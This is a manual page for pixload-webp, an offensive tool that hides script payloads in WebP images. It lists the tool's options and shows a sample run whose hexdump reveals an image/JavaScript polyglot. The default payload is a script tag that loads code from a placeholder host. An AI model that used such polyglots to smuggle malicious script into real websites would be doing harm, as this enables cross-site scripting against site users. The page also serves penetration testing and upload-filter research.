pixload-webp - hide payload/malicious code in WebP images
pixload-webp [OPTION]... FILE
pixload-webp creates a WebP Image with payload, or injects payload into existing image.
Currently, there is no possibility to inject the payload into an existing WebP image. Only the new (minimal) WebP image will be created and your payload will be injected into.
Mandatory arguments to long options are mandatory for short options too.
- -P, --payload STRING
-
Set payload for injection. Default is
<script src=//example.com></script>. - -v, --version
-
Print version and exit.
- -h, --help
-
Print help and exit.
If the output FILE already exists, the payload will be injected into existing image, but this image will be corrupted. Otherwise, the new one will be created.
$ pixload-webp payload.webp
..... WebP Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................
[>] Generating output file
[✔] File saved to: payload.webp
[>] Injecting payload into payload.webp
[✔] Payload was injected successfully
payload.webp: RIFF (little-endian) data, Web/P image
00000000 52 49 46 46 2f 2a 00 00 57 45 42 50 56 50 38 4c |RIFF/*..WEBPVP8L|
00000010 ff ff ff 00 2f 00 00 00 10 07 10 11 11 88 88 fe |..../...........|
00000020 07 00 2a 2f 3d 31 3b 3c 73 63 72 69 70 74 20 73 |..*/=1;<script s|
00000030 72 63 3d 2f 2f 65 78 61 6d 70 6c 65 2e 63 6f 6d |rc=//example.com|
00000040 3e 3c 2f 73 63 72 69 70 74 3e 3b |></script>;|
0000004bpixload-bmp(1), pixload-gif(1), pixload-jpg(1), pixload-png(1)